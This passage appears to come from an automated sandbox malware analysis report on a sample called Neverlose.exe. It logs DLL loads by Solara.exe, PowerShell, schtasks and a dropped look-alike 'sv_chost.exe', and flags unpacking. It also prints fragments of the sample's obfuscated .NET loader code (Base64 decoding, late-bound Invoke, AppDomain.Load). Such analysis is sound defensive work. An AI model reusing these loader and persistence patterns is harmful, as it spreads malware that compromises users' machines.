                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\Neverlose.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
                  Source: sv_chost.lnk.4.drLNK file: ..\..\..\..\..\sv_chost.exe
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\Neverlose.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Neverlose.exeStatic file information: File size 1189376 > 1048576
                  Source: Binary string: C:\Users\Ashtin\Desktop\WTF\SolaraBootstrapper\SolaraBootstrapper\obj\Debug\SolaraBootstrapper.pdbgI source: Neverlose.exe, 00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmp, Neverlose.exe, 00000000.00000002.1730503666.0000000003921000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000000.1722482732.00000000008C2000.00000002.00000001.01000000.00000008.sdmp, SolaraBootstrapper.exe.0.dr
                  Source: Binary string: C:\Users\Ashtin\Desktop\WTF\SolaraBootstrapper\SolaraBootstrapper\obj\Debug\SolaraBootstrapper.pdb source: Neverlose.exe, 00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmp, Neverlose.exe, 00000000.00000002.1730503666.0000000003921000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000000.1722482732.00000000008C2000.00000002.00000001.01000000.00000008.sdmp, SolaraBootstrapper.exe.0.dr

                  Data Obfuscation

                  barindex
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\Desktop\Neverlose.exeUnpacked PE file: 0.2.Neverlose.exe.ff0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;.rsrc:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;.rsrc:ER;Unknown_Section4:ER;.data:ER;
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\Neverlose.exeUnpacked PE file: 0.2.Neverlose.exe.ff0000.0.unpack
                  .NET source code contains method to dynamically call methods (often used by packers)
                  Source: Solara.exe.0.dr, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.szGPQ7UTots3KPdn1WsV8LNvCaApK1XrzWN1sd8X2KIOymxnxoupHlXKuyaT5Zc0jGMZ0I3ZpopawQdmSo7LxdrrrLaGW6hsR5,FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.XnwC07Nw6o7Z2fcaGFN9ettblBVf3C7MVKoe0ModdfG8jK4wRTL9owBW5dIn27QtwGlkDMOiYhoHgDATvHjEW1UZWAs3cLJ1lp,FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.nmcKlcCMqDFPzoSiDUYg5ArBDWY0KEbKvzFTvpqgAxULjY1UaP8sCRWJhfCvPldVdsrHGcqLOiWhhQm90u43qLvzTVyeZQvshg,FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.So79eC3oS7fllvkYLdVdPDTSYdE623O6DZs1mNtAThaYJFaSFNHK6n8fOWtYrI47tFSXox5N3Lt9dHEoKRD6V7EUTTKXqoWXGP,rKw0lbvJvj9v9nQmNRYVdkaAc.mqCA7aLoPydYPnMhmR8mOF7U4()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: Solara.exe.0.dr, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{BdMqCjG9gU04v12ME0bHeB46R0GHv3JD3twCj63kU97qdzEtcJ4XJaTNH0otAcQrtaMS7wZPiObCYSGDfITP7Ed4sJtGkFOzhY[2],rKw0lbvJvj9v9nQmNRYVdkaAc.eEPaikmGKzZgLb0EaDzejP8VO(Convert.FromBase64String(BdMqCjG9gU04v12ME0bHeB46R0GHv3JD3twCj63kU97qdzEtcJ4XJaTNH0otAcQrtaMS7wZPiObCYSGDfITP7Ed4sJtGkFOzhY[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: Solara.exe.0.dr, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { BdMqCjG9gU04v12ME0bHeB46R0GHv3JD3twCj63kU97qdzEtcJ4XJaTNH0otAcQrtaMS7wZPiObCYSGDfITP7Ed4sJtGkFOzhY[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.szGPQ7UTots3KPdn1WsV8LNvCaApK1XrzWN1sd8X2KIOymxnxoupHlXKuyaT5Zc0jGMZ0I3ZpopawQdmSo7LxdrrrLaGW6hsR5,FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.XnwC07Nw6o7Z2fcaGFN9ettblBVf3C7MVKoe0ModdfG8jK4wRTL9owBW5dIn27QtwGlkDMOiYhoHgDATvHjEW1UZWAs3cLJ1lp,FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.nmcKlcCMqDFPzoSiDUYg5ArBDWY0KEbKvzFTvpqgAxULjY1UaP8sCRWJhfCvPldVdsrHGcqLOiWhhQm90u43qLvzTVyeZQvshg,FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.So79eC3oS7fllvkYLdVdPDTSYdE623O6DZs1mNtAThaYJFaSFNHK6n8fOWtYrI47tFSXox5N3Lt9dHEoKRD6V7EUTTKXqoWXGP,rKw0lbvJvj9v9nQmNRYVdkaAc.mqCA7aLoPydYPnMhmR8mOF7U4()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{BdMqCjG9gU04v12ME0bHeB46R0GHv3JD3twCj63kU97qdzEtcJ4XJaTNH0otAcQrtaMS7wZPiObCYSGDfITP7Ed4sJtGkFOzhY[2],rKw0lbvJvj9v9nQmNRYVdkaAc.eEPaikmGKzZgLb0EaDzejP8VO(Convert.FromBase64String(BdMqCjG9gU04v12ME0bHeB46R0GHv3JD3twCj63kU97qdzEtcJ4XJaTNH0otAcQrtaMS7wZPiObCYSGDfITP7Ed4sJtGkFOzhY[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { BdMqCjG9gU04v12ME0bHeB46R0GHv3JD3twCj63kU97qdzEtcJ4XJaTNH0otAcQrtaMS7wZPiObCYSGDfITP7Ed4sJtGkFOzhY[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: sv_chost.exe.4.dr, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.szGPQ7UTots3KPdn1WsV8LNvCaApK1XrzWN1sd8X2KIOymxnxoupHlXKuyaT5Zc0jGMZ0I3ZpopawQdmSo7LxdrrrLaGW6hsR5,FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.XnwC07Nw6o7Z2fcaGFN9ettblBVf3C7MVKoe0ModdfG8jK4wRTL9owBW5dIn27QtwGlkDMOiYhoHgDATvHjEW1UZWAs3cLJ1lp,FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.nmcKlcCMqDFPzoSiDUYg5ArBDWY0KEbKvzFTvpqgAxULjY1UaP8sCRWJhfCvPldVdsrHGcqLOiWhhQm90u43qLvzTVyeZQvshg,FNA2ULLgARIpzwFesiV1v0hEBu7pqRep1y0pIlxqyyWEoOP7nxsGotFsZONtlrl3vjaO6mPqWzZ11Iqi5XCwj5LtgIbCLwaBlN.So79eC3oS7fllvkYLdVdPDTSYdE623O6DZs1mNtAThaYJFaSFNHK6n8fOWtYrI47tFSXox5N3Lt9dHEoKRD6V7EUTTKXqoWXGP,rKw0lbvJvj9v9nQmNRYVdkaAc.mqCA7aLoPydYPnMhmR8mOF7U4()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: sv_chost.exe.4.dr, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{BdMqCjG9gU04v12ME0bHeB46R0GHv3JD3twCj63kU97qdzEtcJ4XJaTNH0otAcQrtaMS7wZPiObCYSGDfITP7Ed4sJtGkFOzhY[2],rKw0lbvJvj9v9nQmNRYVdkaAc.eEPaikmGKzZgLb0EaDzejP8VO(Convert.FromBase64String(BdMqCjG9gU04v12ME0bHeB46R0GHv3JD3twCj63kU97qdzEtcJ4XJaTNH0otAcQrtaMS7wZPiObCYSGDfITP7Ed4sJtGkFOzhY[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: sv_chost.exe.4.dr, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { BdMqCjG9gU04v12ME0bHeB46R0GHv3JD3twCj63kU97qdzEtcJ4XJaTNH0otAcQrtaMS7wZPiObCYSGDfITP7Ed4sJtGkFOzhY[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                  .NET source code contains potential unpacker
                  Source: Solara.exe.0.dr, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: _8wGo8NDHX8IchWy5emXSDv58GsBJnMRJrxlvCNrMLX48UbwnmVQfxREEfpw4G2Tuu4auegCyaaryctNC0Q0nLeRkTUs3XboLtu System.AppDomain.Load(byte[])
                  Source: Solara.exe.0.dr, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: k3WtfJUop8AeC75aF9MWXOvU0kyc3RiYETDEPJr65npFYnL3qh4psu9CQUQlfkRh364qXdM9yt6ZpsLb67ydFLXZGdTD2DgmnS System.AppDomain.Load(byte[])
                  Source: Solara.exe.0.dr, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: k3WtfJUop8AeC75aF9MWXOvU0kyc3RiYETDEPJr65npFYnL3qh4psu9CQUQlfkRh364qXdM9yt6ZpsLb67ydFLXZGdTD2DgmnS
                  Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, Lt0dqqWTBCH6whG4NLnykxcqor0GoQWjCil4LRCzURXZ4A85bVs6pPNrPRFGhJrcWBGLgDUolmJZPY1MXXQqMON8GY62EkGoPO.cs.Net Code: _8wGo8NDHX8IchWy5emXSDv58GsBJnMRJrxlvCNrMLX48UbwnmVQfxREEfpw4G2Tuu4auegCyaaryctNC0Q0nLeRkTUs3XboLtu System.AppDomain.Load(byte[])
